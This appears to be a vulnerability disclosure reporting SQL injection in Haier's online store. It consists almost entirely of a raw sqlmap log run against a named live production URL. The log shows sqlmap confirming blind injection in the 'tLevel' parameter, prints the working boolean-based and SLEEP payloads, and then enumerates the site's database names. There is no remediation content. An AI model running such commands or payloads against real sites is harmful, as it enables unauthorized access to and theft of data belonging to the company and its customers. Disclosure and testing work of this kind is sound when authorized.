info testing mysql_SQL injection in Haier's official online store can leak site-wide data

[[email protected]~]# Sqlmap Sqlmap -u "http://fw.rrs.com/snaplb/FAQ/FAQList?tLevel=33480a48-0f72-489a-b209-16a7e0331634&pageNum=1&pageSize=5" --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap

[*] starting at 15:10:01

[15:10:02] [INFO] testing connection to the target URL

[15:10:02] [INFO] heuristics detected web page charset 'ISO-8859-2'

[15:10:03] [INFO] testing if the target URL is stable. This can take a couple of seconds

[15:10:04] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y

[15:10:06] [INFO] testing if GET parameter 'tLevel' is dynamic

[15:10:07] [INFO] confirming that GET parameter 'tLevel' is dynamic

[15:10:07] [INFO] GET parameter 'tLevel' is dynamic

[15:10:08] [WARNING] heuristic (basic) test shows that GET parameter 'tLevel' might not be injectable

[15:10:08] [INFO] testing for SQL injection on GET parameter 'tLevel'

[15:10:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:10:13] [INFO] GET parameter 'tLevel' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[15:10:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:10:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:10:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:10:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:10:21] [INFO] testing 'MySQL inline queries'

[15:10:21] [INFO] testing 'PostgreSQL inline queries'

[15:10:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:10:21] [INFO] testing 'Oracle inline queries'

[15:10:21] [INFO] testing 'SQLite inline queries'

[15:10:21] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:10:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:10:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:10:22] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:11:22] [INFO] GET parameter 'tLevel' is 'MySQL > 5.0.11 AND time-based blind' injectable

[15:11:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[15:11:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[15:11:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

GET parameter 'tLevel' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

[15:12:04] [INFO] testing if GET parameter 'pageNum' is dynamic

[15:12:05] [INFO] confirming that GET parameter 'pageNum' is dynamic

[15:12:06] [INFO] GET parameter 'pageNum' is dynamic

[15:12:06] [WARNING] heuristic (basic) test shows that GET parameter 'pageNum' might not be injectable

[15:12:06] [INFO] testing for SQL injection on GET parameter 'pageNum'

[15:12:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:12:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:12:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:12:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:12:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:12:09] [INFO] testing 'MySQL inline queries'

[15:12:09] [INFO] testing 'PostgreSQL inline queries'

[15:12:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:12:09] [INFO] testing 'Oracle inline queries'

[15:12:09] [INFO] testing 'SQLite inline queries'

[15:12:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:12:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:12:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:12:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:12:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[15:12:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[15:12:12] [INFO] testing 'Oracle AND time-based blind'

[15:12:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[15:12:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[15:12:26] [WARNING] GET parameter 'pageNum' is not injectable

[15:12:26] [INFO] testing if GET parameter 'pageSize' is dynamic

[15:12:27] [INFO] confirming that GET parameter 'pageSize' is dynamic

[15:12:27] [INFO] GET parameter 'pageSize' is dynamic

[15:12:27] [WARNING] heuristic (basic) test shows that GET parameter 'pageSize' might not be injectable

[15:12:27] [INFO] testing for SQL injection on GET parameter 'pageSize'

[15:12:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:12:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:12:30] [INFO] testing 'MySQL inline queries'

[15:12:31] [INFO] testing 'PostgreSQL inline queries'

[15:12:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:12:31] [INFO] testing 'Oracle inline queries'

[15:12:31] [INFO] testing 'SQLite inline queries'

[15:12:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:12:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:12:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:12:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:12:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[15:12:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[15:12:34] [INFO] testing 'Oracle AND time-based blind'

[15:12:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[15:12:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[15:12:47] [WARNING] GET parameter 'pageSize' is not injectable

sqlmap identified the following injection points with a total of 439 HTTP(s) requests:

---

Place: GET

Parameter: tLevel

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: tLevel=33480a48-0f72-489a-b209-16a7e0331634' AND 2704=2704 AND 'shJS'='shJS&pageNum=1&pageSize=5

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: tLevel=33480a48-0f72-489a-b209-16a7e0331634' AND SLEEP(5) AND 'LABx'='LABx&pageNum=1&pageSize=5

---

[15:12:47] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, JSP

back-end DBMS: MySQL 5.0.11

[15:12:47] [INFO] fetching database names

[15:12:47] [INFO] fetching number of databases

[15:12:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[15:12:47] [INFO] retrieved: 18

[15:12:54] [INFO] retrieved: information_schema

[15:14:17] [INFO] retrieved: aijia

[15:14:43] [INFO] retrieved: hibernate

[15:15:26] [INFO] retrieved: huxing

[15:15:57] [INFO] retrieved: iudp_basedata

[15:17:03] [INFO] retrieved: iudp_huxing

[15:17:59] [INFO] retrieved: iudp_rbac

[15:18:46] [INFO] retrieved: iudp_sh
